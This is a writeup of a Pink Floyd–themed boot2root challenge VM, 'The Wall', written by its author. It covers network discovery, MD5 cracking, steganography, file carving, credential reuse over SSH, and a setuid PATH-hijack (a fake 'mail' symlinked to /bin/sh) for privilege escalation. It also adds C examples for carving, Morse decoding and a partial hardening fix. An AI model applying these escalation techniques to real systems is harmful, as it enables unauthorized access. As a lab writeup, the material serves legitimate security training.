Set the Controls for the Heart of the Sun
Recently I created my first boot2root challenge, The Wall for the Vulnhub community. I hope everyone enjoys the challenge, and here’s my writeup of the intended path to root.
“In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.
Your challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!”
Before we begin.. we had better get some Floyd tunes rocking. My choice of album today is Pink Floyd’s sixth studio album; Meddle (1971). With the music sorted, let’s leave The Dark Side of the Moon and Set the Controls for the Heart of the Sun!
Just like all boot2root CTF challenges, we need to find our victim machine:
```
root@omerta:~# arp -an
? (192.168.240.158) at <incomplete> on eth0
? (192.168.240.2) at 00:50:56:f4:ee:26 [ether] on eth0
? (192.168.240.157) at 00:0c:29:1c:22:ef [ether] on eth0
? (192.168.240.254) at 00:50:56:ec:12:d7 [ether] on eth0
```
There it is: (192.168.240.157) at 00:0c:29:1c:22:ef; just Another Brick in the Wall.
Time for some nmap Pink Floyd Discovery:
```
root@omerta:~# nmap -sT -Pn -n -A -v -p- 192.168.240.157

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-06 11:53 AEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:53
Completed NSE at 11:53, 0.00s elapsed
Initiating NSE at 11:53
Completed NSE at 11:53, 0.00s elapsed
Initiating ARP Ping Scan at 11:53
Scanning 192.168.240.157 [1 port]
Completed ARP Ping Scan at 11:53, 0.10s elapsed (1 total hosts)
Initiating Connect Scan at 11:53
Scanning 192.168.240.157 [65535 ports]
Connect Scan Timing: About 2.25% done; ETC: 12:16 (0:22:26 remaining)
Connect Scan Timing: About 5.20% done; ETC: 12:16 (0:21:15 remaining)
---snip---
All 65535 scanned ports on 192.168.240.157 are filtered
MAC Address: 00:0C:29:1C:22:EF (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
---snip---
```
All 65535 ports are filtered? No Echoes to ICMP probes? Interesting… It looks as though The Wall is actually some sort of firewall!
Let’s see if we can find any hints in the network traffic:
```
root@omerta:~# tcpdump host 192.168.240.157
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
12:21:23.496106 IP 192.168.240.157.4295 > 192.168.240.2.1337: Flags [S], seq 3807235731, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 726845931 ecr 0], length 0
12:21:23.496118 IP 192.168.240.2.1337 > 192.168.240.157.4295: Flags [R.], seq 0, ack 3807235732, win 32767, length 0
12:21:23.502933 ARP, Request who-has 192.168.240.3 tell 192.168.240.157, length 46
12:21:23.509897 ARP, Request who-has 192.168.240.4 tell 192.168.240.157, length 46
12:21:23.516766 ARP, Request who-has 192.168.240.5 tell 192.168.240.157, length 46
12:21:23.523689 ARP, Request who-has 192.168.240.6 tell 192.168.240.157, length 46
12:21:23.530565 ARP, Request who-has 192.168.240.7 tell 192.168.240.157, length 46
12:21:23.537400 ARP, Request who-has 192.168.240.8 tell 192.168.240.157, length 46
12:21:23.544263 ARP, Request who-has 192.168.240.9 tell 192.168.240.157, length 46
12:21:23.551053 ARP, Request who-has 192.168.240.10 tell 192.168.240.157, length 46
12:21:23.557836 ARP, Request who-has 192.168.240.11 tell 192.168.240.157, length 46
12:21:23.564696 ARP, Request who-has 192.168.240.12 tell 192.168.240.157, length 46
---snip---
```
Okay then… there is lots of broadcast traffic coming from The Wall. Let’s filter that out:
```
root@omerta:~# tcpdump host 192.168.240.157 and not arp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
12:23:01.982737 IP 192.168.240.157.20404 > 192.168.240.254.1337: Flags [S], seq 1651764410, win 16384, options [mss 460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 3087165336 ecr 0], length 0
12:23:12.069720 IP 192.168.240.157.47863 > 192.168.240.1.1337: Flags [S], seq 1251225734, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 1072158578 ecr 0], length 0
12:23:12.069734 IP 192.168.240.1.1337 > 192.168.240.157.47863: Flags [R.], seq 0, ack 1251225735, win 0, length 0
12:23:12.076738 IP 192.168.240.157.22134 > 192.168.240.2.1337: Flags [S], seq 412790070, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 745172507 ecr 0], length 0
12:23:12.076742 IP 192.168.240.2.1337 > 192.168.240.157.22134: Flags [R.], seq 0, ack 412790071, win 32767, length 0
12:23:13.355486 IP 192.168.240.157.19559 > omerta.1337: Flags [S], seq 4001087718, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 2057626273 ecr 0], length 0
12:23:13.355516 IP omerta.1337 > 192.168.240.157.19559: Flags [R.], seq 0, ack 4001087719, win 0, length 0
12:23:14.369038 IP 192.168.240.157.24465 > 192.168.240.254.1337: Flags [S], seq 3544915988, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 1150007767 ecr 0], length 0
12:23:23.466803 IP 192.168.240.157.4199 > 192.168.240.2.1337: Flags [S], seq 882354251, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 767958101 ecr 0], length 0
12:23:23.466813 IP 192.168.240.2.1337 > 192.168.240.157.4199: Flags [R.], seq 0, ack 882354252, win 32767, length 0
```
It looks like The Wall is sweeping the subnet, trying to connect to any host listening on port 1337 (every SYN so far has been answered with a RST because nobody is listening). Time to set up a listener on port 1337.
Just like Money, “it’s a hit”!
“… don’t be surprised when a crack in the ice appears under your feet”. Interesting.. a hint perhaps? Like all good challenges, enumeration is always the key. Port scanning the host again reveals port 80/tcp is now open. Now we are getting somewhere… let’s take a look. Browsing to port 80 presents us with a great photograph of all original band members:
Let’s look a little harder:
```
root@omerta:~# curl -i -A "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" 192.168.240.157
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 539
Content-Type: text/html
Date: Sat, 28 Nov 2015 05:56:18 GMT
Last-Modified: Sat, 24 Oct 2015 15:20:23 GMT
Server: OpenBSD httpd

<html>
<body bgcolor="#000000">
<center><img src="pink_floyd.jpg"</img></center>
</body>
</html>

<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall

Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork.

737465673d3333313135373330646262623337306663626539373230666536333265633035-->
```
Some interesting comments there. First off, let’s decode that hex:
```
root@omerta:~# echo 737465673d3333313135373330646262623337306663626539373230666536333265633035 | xxd -r -p
steg=33115730dbbb370fcbe9720fe632ec05
```
Decoding the hex reveals another secret; is it encoding or a hash? Looks like an MD5 hash to me, but let’s double check:
```
root@omerta:~# hash-identifier
---snip---
HASH: 33115730dbbb370fcbe9720fe632ec05

Possible Hashs:
[+] MD5
```
Time to crack the hash:
```
root@omerta:~# hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
This copy of hashcat will expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcat v0.49 with 4 threads and 32mb segment-size...

Added hashes from file hash.txt: 1 (1 salts)
Activating quick-digest mode for single-hash

NOTE: press enter for status-screen

33115730dbbb370fcbe9720fe632ec05:divisionbell

All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, - words
Progress..: 1835616/3627099 (50.61%)
Running...: --:--:--:--
Estimated.: --:--:--:--

Started: Sun Dec 6 12:53:57 2015
Stopped: Sun Dec 6 12:53:57 2015
```
33115730dbbb370fcbe9720fe632ec05:divisionbell. Too easy… so now we have steg=divisionbell, but what can we do with that? Let’s look at the comments in the webpage again. “The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork.”
Okay.. so we are looking at steganography here: a key named steg, a hint about something hidden in artwork, and a JPEG on the front page. If you want to know more about the Publius Enigma mystery, take a look here. Onwards and upwards.. it’s Steghide time!
```
root@omerta:~# steghide extract -sf Desktop/floyd/pink_floyd.jpg
Enter passphrase:
wrote extracted data to "pink_floyd_syd.txt".
root@omerta:~#
root@omerta:~#
root@omerta:~# cat pink_floyd_syd.txt
Hey Syd,

I hear you're full of dust and guitars? If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in his collection.
```
More decoding/decrypting! Base64 decoding first:
```
root@omerta:~# echo U3lkQmFycmV0dA== | base64 -d;echo
SydBarrett
```
Running the second half through hash-identifier reveals it’s also an MD5 hash. Let’s crack it:
```
root@omerta:~# hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
---snip---
f831605ae34c2399d1e5bb3a4ab245d0:pinkfloydrocks
---snip---
```
“SydBarrett” and “pinkfloydrocks”. Sounds like a username and password to me?
After some time fuzzing the web application and pottering around looking for clues, I take another look at the text file which was hidden in the pink_floyd.jpg: “Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.”
1965? Surely not another port opening on the firewall?
```
root@omerta:~# nmap -Pn -n -sT -A -p 1965 192.168.240.157

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-06 13:10 AEST
Nmap scan report for 192.168.240.157
Host is up (0.00057s latency).
PORT     STATE SERVICE VERSION
1965/tcp open  ssh     OpenSSH 7.0 (protocol 2.0)
| ssh-hostkey:
|   2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)
|_  256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)
---snip---
```
Yep… port 1965/tcp is open, and it’s an SSH port. Nice!
```
root@omerta:~# ssh -p 1965 SydBarrett@192.168.240.157
The authenticity of host '[192.168.240.157]:1965 ([192.168.240.157]:1965)' can't be established.
ECDSA key fingerprint is 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.240.157]:1965' (ECDSA) to the list of known hosts.
SydBarrett@192.168.240.157's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.240.157 closed.
```
So it looks like we have the correct username and password combination; however, the account is not allowed an interactive shell over SSH, only sftp.
```
root@omerta:~# sftp -P 1965 SydBarrett@192.168.240.157
SydBarrett@192.168.240.157's password:
Connected to 192.168.240.157.
sftp> ls -al
drwxr-x---    3 0        1000          512 Nov 28 06:33 .
drwxr-x---    3 0        1000          512 Oct 24 20:16 ..
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 .mail
-rw-r--r--    1 0        1000         1912 Oct 25 22:56 bio.txt
-rw-r--r--    1 0        1000       868967 Oct 24 16:17 syd_barrett_profile_pic.jpg
sftp>
```
Pottering around the sftp directory, I grab the following loot:
bio.txt
syd_barrett_profile_pic.jpg
.mail/sent-items
.mail/.stash/eclipsed_by_the_moon
The bio.txt file had exactly what you would expect… Syd’s biography. Apart from that, there don’t seem to be any hints or other useful information.
Next.. the profile pic:
What a legend! .. but no real hint that I can see. Running exiftool and strings on the image doesn’t give us any clues either.
Next.. the sent-items:
```
root@omerta:~# cat sent-items
Date: Sun, 24 Oct 1965 18:45:21 +0200
From: Syd Barrett <syd@pink.floyd>
Reply-To: Syd Barret <syd@pink.floyd>
To: Roger Waters <roger@pink.floyd>
Subject: Had to hide the stash

Roger...

I had to hide the stash. Usual deal.. just use the scalpel when you find it.

Ok, sorry for that.

Rock on man

"Syd"
```
This looks promising. A reference to the stash (.stash) and to using the scalpel when we find the stash. Let’s take a look at the eclipsed_by_the_moon file we grabbed from the stash:
```
root@omerta:~# file eclipsed_by_the_moon
eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 10:15:47 2015, from Unix
```
A gzip archive. Uncompressing the file gives us another file, eclipsed_by_the_moon.lsd:
```
root@omerta:~# file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)
```
Looks like a FAT16 partition image. Mounting it and taking a closer look gives us nothing to work with; the filesystem appears empty, so whatever is in there has been deleted or never had a directory entry. “Usual deal.. just use the scalpel when you find it.” Sounds like file carving to me.. let’s take a closer look with scalpel:
```
root@omerta:~# scalpel -c /etc/scalpel/scalpel.conf eclipsed_by_the_moon.lsd
Scalpel version 1.60
Written by Golden G. Richard III, based on Foremost 0.69.

Opening target "/root/eclipsed_by_the_moon.lsd"

Image file pass 1/2: eclipsed_by_the_moon.lsd: 100.0% |**********| 47.0 MB 00:00 ETA
Allocating work queues...
Work queues allocation complete. Building carve lists...
Carve lists built. Workload:
jpg with header "\xff\xd8\xff\xe0\x00\x10" and footer "\xff\xd9" --> 1 files
Carving files from image.
Image file pass 2/2: eclipsed_by_the_moon.lsd: 100.0% |**********| 47.0 MB 00:00 ETA
Processing of image file complete. Cleaning up...
Done.
Scalpel is done, files carved = 1, elapsed = 1 seconds.
```
A jpg file carved out, hey? Let’s take a look:
It’s Roger Waters.. and he’s kind enough to give us a password.
Quick detour here just for your info. There are plenty of other tools (foremost, autopsy, etc.) to do this type of forensics work, but here’s another way you could have carved out the jpg:
```
root@omerta:~# binwalk eclipsed_by_the_moon.lsd

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
214016        0x34400         JPEG image data, JFIF standard 1.01
---snip---

root@omerta:~# binwalk --dd jpeg:jpg:2 eclipsed_by_the_moon.lsd

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
214016        0x34400         JPEG image data, JFIF standard 1.01
---snip---

root@omerta:~# file _eclipsed_by_the_moon.lsd.extracted/34400.jpg
_eclipsed_by_the_moon.lsd.extracted/34400.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 604x388, frames 3
```
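To show what scalpel and binwalk are actually doing here, this is an added header/footer carver (my own example, not scalpel's or binwalk's code) that implements the exact rule scalpel reported above: JFIF header FF D8 FF E0 00 10, footer FF D9. It runs against a small constructed buffer rather than the challenge's .lsd image, and the decoys in that buffer show why the footer is only searched after the header and why a bare FF D8 FF is not enough.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* The carve rule scalpel reported on the page: JFIF header FF D8 FF E0 00 10, footer FF D9. */
static const uint8_t JPG_HDR[] = {0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10};
static const uint8_t JPG_FTR[] = {0xff, 0xd9};

/* Return the offset of needle in hay[from..hlen), or -1 if absent. */
static long find_bytes(const uint8_t *hay, size_t hlen, size_t from,
                       const uint8_t *needle, size_t nlen)
{
    if (nlen == 0 || hlen < nlen) return -1;
    for (size_t i = from; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0) return (long)i;
    return -1;
}

/* Carve the first JPEG whose header lies at or after `from`. The footer is only
 * searched after the header and within max_len bytes of it, mirroring scalpel's
 * per-type size limit. On success *off/*out_len describe the carved object and 1
 * is returned; a header with no footer inside the window is reported as 0. */
int carve_jpeg(const uint8_t *img, size_t len, size_t from, size_t max_len,
               size_t *off, size_t *out_len)
{
    long h = find_bytes(img, len, from, JPG_HDR, sizeof JPG_HDR);
    if (h < 0) return 0;
    size_t start = (size_t)h;
    size_t window = (max_len < len - start) ? start + max_len : len;
    long f = find_bytes(img, window, start + sizeof JPG_HDR, JPG_FTR, sizeof JPG_FTR);
    if (f < 0) return 0;
    *off = start;
    *out_len = (size_t)f + sizeof JPG_FTR - start;
    return 1;
}

/* Constructed sample "disk image" (not the challenge's eclipsed_by_the_moon.lsd):
 * filler bytes, a stray FF D9 at offset 50, a non-JFIF FF D8 FF DB at offset 100
 * that the strict header rule must skip, and a minimal JFIF blob at offset 200. */
static const uint8_t FAKE_JPG[] = {
    0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 'J', 'F', 'I', 'F', 0x00,
    0x01, 0x01, 0x00, 0x00, 0x48, 0x00, 0x48, 0x00, 0x00,
    'p', 'a', 'y', 'l', 'o', 'a', 'd', 0xff, 0xd9
};
static uint8_t g_img[512];

size_t build_sample_image(void)
{
    memset(g_img, 0xab, sizeof g_img);
    g_img[50] = 0xff; g_img[51] = 0xd9;                                    /* decoy footer */
    g_img[100] = 0xff; g_img[101] = 0xd8; g_img[102] = 0xff; g_img[103] = 0xdb; /* SOI, not JFIF */
    memcpy(g_img + 200, FAKE_JPG, sizeof FAKE_JPG);
    return sizeof g_img;
}

size_t sample_jpeg_len(void) { return sizeof FAKE_JPG; }

/* Convenience wrapper: build the sample and carve from offset 0 with a 10 MB limit. */
int carve_sample(size_t *off, size_t *len)
{
    size_t n = build_sample_image();
    return carve_jpeg(g_img, n, 0, 10u * 1024 * 1024, off, len);
}

int main(void)
{
    size_t off, len;
    if (!carve_sample(&off, &len)) { puts("no jpeg carved"); return 1; }
    printf("jpeg at offset %zu (0x%zx), %zu bytes\n", off, off, len);
    /* A real carver would now fwrite(g_img + off, 1, len, out) to <offset>.jpg. */
    return 0;
}
```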
Moving onwards there’s only one thing to do; try logging on as Roger:
```
root@omerta:~# ssh -p 1965 RogerWaters@192.168.240.157
RogerWaters@192.168.240.157's password:
Last login: Sat Nov 28 04:29:53 2015 from 192.168.240.153
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

[ASCII-art login banner snipped]
```
Once again… we have a bio.txt….. No lead there.
There’s a secret-diary, but no real lead there either.
Let’s take a look at the profile image:
Nothing obvious here, and no results with strings or exiftool. Taking a look around Roger’s home directory doesn’t reveal any clues, so let’s start our normal enumeration techniques. Firstly, let’s look for setuid binaries:
```
$ find / -perm -6000 -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
-r-sr-sr-x  1 root          daemon          30560 Aug 16 18:26 /usr/bin/lpr
-r-sr-sr-x  1 root          daemon          26428 Aug 16 18:26 /usr/bin/lprm
-rws--s--x  1 NickMason     NickMason        7291 Aug  8 00:33 /usr/local/bin/brick
-rwsr-s---  1 DavidGilmour  RichardWright    7524 Oct 25 07:58 /usr/local/bin/shineon
-r-sr-sr-x  2 root          authpf          22292 Aug 16 18:26 /usr/sbin/authpf
-r-sr-sr-x  2 root          authpf          22292 Aug 16 18:26 /usr/sbin/authpf-noip
```
The brick binary is setuid NickMason and world executable, so let’s take a look:
```
$ /usr/local/bin/brick
What have we here, laddie? Mysterious scribbings? A secret code? Oh, poems, no less! Poems everybody!

Who is the only band member to be featured on every Pink Floyd album? : Nick Mason

/bin/sh: Cannot determine current working directory
$ whoami
NickMason
```
Nice! Just like that we have pivoted to the NickMason account. We head to Nick’s home directory, and again we find a bio text and a profile pic. Let’s take a look at the bio.txt file first:
```
$ cat bio.txt
"Nicholas Berkeley "Nick" Mason (born 27 January 1944) is an English musician and composer, best known as the drummer of Pink Floyd. He is the only constant member of the band since its formation in 1965. Despite solely writing only a few Pink Floyd songs, Mason has co-written some of Pink Floyd's most popular compositions such as "Echoes" and "Time". Mason is the only Pink Floyd member to be featured on every one of their albums. It is estimated that as of 2010, the group have sold over 250 million records worldwide,[1][2] including 75 million units sold in the United States.

He competes in auto racing events, such as the 24 Hours of Le Mans. On 26 November 2012, Mason received an Honorary Doctor of Letters from the University of Westminster at the presentation ceremony of the School of Architecture and Built Environment (he had studied architecture at the University's predecessor, Regent Street Polytechnic, 1962-1967)."

I wander if anyone is reading these bio's? Richard Wright.. if you're reading this, I'm not really going to cut you into little pieces. I was just having a joke. Anyhow, I have now added you to thewall. You're username is obvious. You'll find your password in my profile pic.

Source: Wikipedia (https://en.wikipedia.org/wiki/Nick_Mason)
```
I’m glad I read Nick’s bio. The last paragraph says it all… “You’ll find your password in my profile pic.” After transferring the file, it doesn’t take long to realise that, despite the .jpg extension, this is not actually a JPEG at all.. it’s an Ogg Vorbis audio file:
```
root@omerta:~# file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I
```
There is no actual profile picture for Nick on The Wall, so here’s one I quickly grabbed from google :)
Listening to the audio we can very quickly hear morse code embedded within the piano music. Let’s use Sonic Visualiser to see if we can pick out the morse in the spectrogram (Layer > Add Spectrogram > All Channels Mixed):
Jotting down the morse gives us the following:
.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-
Decoding this results in the following ASCII string:
richardwright1943farfisa
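As an added example (not part of the original writeup), here is a small Morse decoder that turns the jotted-down dots and dashes above into that string. It handles letters and digits, which is all the challenge string uses; "/" is accepted as a word separator, and an unknown symbol is emitted as "?" rather than aborting, since a spectrogram transcription is easy to get slightly wrong.

```c
#include <stdio.h>
#include <string.h>

/* International Morse, letters and digits only (the page's string needs nothing else). */
static const struct { const char *code; char ch; } MORSE[] = {
    {".-",'a'},   {"-...",'b'}, {"-.-.",'c'}, {"-..",'d'},  {".",'e'},    {"..-.",'f'},
    {"--.",'g'},  {"....",'h'}, {"..",'i'},   {".---",'j'}, {"-.-",'k'},  {".-..",'l'},
    {"--",'m'},   {"-.",'n'},   {"---",'o'},  {".--.",'p'}, {"--.-",'q'}, {".-.",'r'},
    {"...",'s'},  {"-",'t'},    {"..-",'u'},  {"...-",'v'}, {".--",'w'},  {"-..-",'x'},
    {"-.--",'y'}, {"--..",'z'},
    {"-----",'0'}, {".----",'1'}, {"..---",'2'}, {"...--",'3'}, {"....-",'4'},
    {".....",'5'}, {"-....",'6'}, {"--...",'7'}, {"---..",'8'}, {"----.",'9'},
};

/* Look up one symbol of `len` dots/dashes; '?' marks an unknown symbol. */
static char morse_lookup(const char *sym, size_t len)
{
    for (size_t i = 0; i < sizeof MORSE / sizeof MORSE[0]; i++)
        if (strlen(MORSE[i].code) == len && memcmp(MORSE[i].code, sym, len) == 0)
            return MORSE[i].ch;
    return '?';
}

/* Decode space-separated symbols ("/" = word gap) into out. Returns the number of
 * characters written, or -1 on an invalid character or a too-small buffer. */
int morse_decode(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    const char *p = in;
    if (outsz == 0) return -1;
    while (*p) {
        while (*p == ' ') p++;                 /* skip symbol separators */
        if (!*p) break;
        if (n + 1 >= outsz) return -1;
        if (*p == '/') { out[n++] = ' '; p++; continue; }
        const char *start = p;
        while (*p == '.' || *p == '-') p++;
        if (p == start) return -1;             /* something other than . - / space */
        out[n++] = morse_lookup(start, (size_t)(p - start));
    }
    out[n] = '\0';
    return (int)n;
}

/* The transcription from the spectrogram, exactly as jotted down on the page. */
#define PAGE_MORSE ".-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-"

/* Decode the page's string into a static buffer (convenient for callers and tests). */
const char *decode_page_morse(void)
{
    static char buf[64];
    if (morse_decode(PAGE_MORSE, buf, sizeof buf) < 0) buf[0] = '\0';
    return buf;
}

int main(void)
{
    printf("%s\n", decode_page_morse());
    return 0;
}
```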
SSH’ing into The Wall as Richard Wright doesn’t seem to work, and quite frankly trying richardwright1943farfisa, 1943farfisa, and a number of other permutations of the password only resulted in me getting closer to Brain Damage. And then I had a light bulb moment.. what if Richard isn’t allowed to SSH into the box?
```
$ cat /etc/ssh/sshd_config
Port 1965
AllowUsers SydBarrett RogerWaters
#LoginGraceTime 2m
PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
---snip---
```
And there it is. AllowUsers restricts SSH to Syd and Roger, so Richard’s credentials are fine; they just have to be used locally, via login from the shell we already have:
```
$ login
login: RichardWright
Password:
$ whoami
RichardWright
```
How frustrating! It’s ok… Breathe, “breath in the air”.
Once again we have a bio.txt file and a profile picture. The bio.txt doesn’t seem to have any hints or data. Let’s take a look at the profile pic:
Nothing obvious in the profile picture either. Let’s take a look at Richard’s mailbox, as the file size indicates there may be some email:
```
$ cat mbox
From DavidGilmour@thewall.localdomain Tue Oct 27 01:41:18 2015
Return-Path: DavidGilmour@thewall.localdomain
Delivered-To: RichardWright@thewall.localdomain
Received: from localhost (thewall.localdomain [local])
	by thewall.localdomain (OpenSMTPD) with ESMTPA id 3ad74b19
	for <RichardWright@thewall.localdomain>;
	Tue, 27 Oct 2015 01:41:18 +1000 (AEST)
From: David Gilmour <DavidGilmour@thewall.localdomain>
Date: Tue, 27 Oct 2015 02:41:18 +1000 (AEST)
Message-Id: <9059884549097248741.enqueue@thewall.localdomain>
To: RichardWright@thewall.localdomain
Subject: Re: Brain Damage
Status: RO

G'day Rick.. how's the ivory tickling going?

There's plenty of bricks in the wall, so I'll give you a few when we catch up. For now, just use that command I gave you with the menu.

Dave

----------

Hey Dave,

I feel like we're back in the studio for The Dark Side of the Moon. Sorry to keep bugging you, but can you tell me again how to do things when I'm on thewall.

Rick
```
Good stuff! An email conversation between Richard Wright and David Gilmour. It looks like Richard is having some dramas remembering Linux commands, so David has kindly created Richard a menu binary. Nice. Do you remember from our previous search for setuid binaries, we found one called brick? Did you also notice there was also one called shineon, setuid DavidGilmour and executable by group RichardWright? If not, you were probably just having A Momentary Lapse of Reason. Let’s take a look:
```
$ /usr/local/bin/shineon

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
1

Time - The Dark Side of the Moon

   November 2015
Su Mo Tu We Th Fr Sa
 1  2  3  4  5  6  7
 8  9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30

Press ENTER to continue.

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
2

Echoes - Meddle

RogerWaters ttyp0 Nov 28 19:05 (192.168.240.153)

Press ENTER to continue.

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
3

Is There Anybody Out There? - The Wall

PING www.google.com (59.167.145.249): 56 data bytes
64 bytes from 59.167.145.249: icmp_seq=0 ttl=128 time=36.489 ms
64 bytes from 59.167.145.249: icmp_seq=1 ttl=128 time=36.792 ms
64 bytes from 59.167.145.249: icmp_seq=2 ttl=128 time=36.847 ms

--- www.google.com ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 36.489/36.709/36.847/0.221 ms

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4

Keep Talking- The Division Bell

No mail for RichardWright

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
5

Quitting program!
```
A simple menu for common tasks, it would seem. Running through each option doesn’t show anything strange. Let’s take a look with strings:
```
$ strings /usr/local/bin/shineon
/usr/libexec/ld.so
OpenBSD
OpenBSD
libc.so.80.1
printf
__stack_smash_handler
__srget
getc
puts
system
_thread_atfork
environ
__progname
__cxa_atexit
__sF
__isthreaded
scanf
_Jv_RegisterClasses
__got_start
__got_end
__data_start
_edata
__bss_start
__progname_storage
__fini
__init_tcb
QRP1
[^_]
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail
```
A simple C program that shells out via system(), with one very insecure call: cal, who and ping are invoked by absolute path, but mail is called with a bare name, so the setuid binary runs whatever mail the caller’s PATH resolves first. There’s our way forward:
```
$ ln -s /bin/sh mail
$ export PATH=.:$PATH
$ /usr/local/bin/shineon

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4

Keep Talking- The Division Bell

$ whoami
DavidGilmour
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
```
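For the defensive side of this, here is an added example (my own code, not the shineon source, which the page only shows through strings) of the unsafe pattern beside a hardened helper: the fix is to resolve the command against a compiled-in list of trusted directories instead of the caller's PATH, refuse anything that is a path rather than a bare name or that is world-writable, and execute it via execve with a fixed environment rather than through a shell. The directory list and environment below are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Directories a privileged program may run helpers from (assumed list). The caller's
 * $PATH is never consulted, so "PATH=.:$PATH" plus a fake mail changes nothing. */
static const char *const TRUSTED_DIRS[] = { "/bin", "/usr/bin", "/sbin", "/usr/sbin" };

/* The shineon bug in one line: the shell spawned by system() resolves "mail"
 * through the caller's PATH, with the caller's environment, under the setuid euid. */
int run_mail_vulnerable(void) { return system("mail"); }

/* Resolve a bare command name against TRUSTED_DIRS only.
 * Returns 0 and writes the absolute path to out on success, -1 otherwise. */
int resolve_trusted(const char *cmd, char *out, size_t outsz)
{
    if (cmd == NULL || *cmd == '\0' || strchr(cmd, '/') != NULL) return -1; /* names only */
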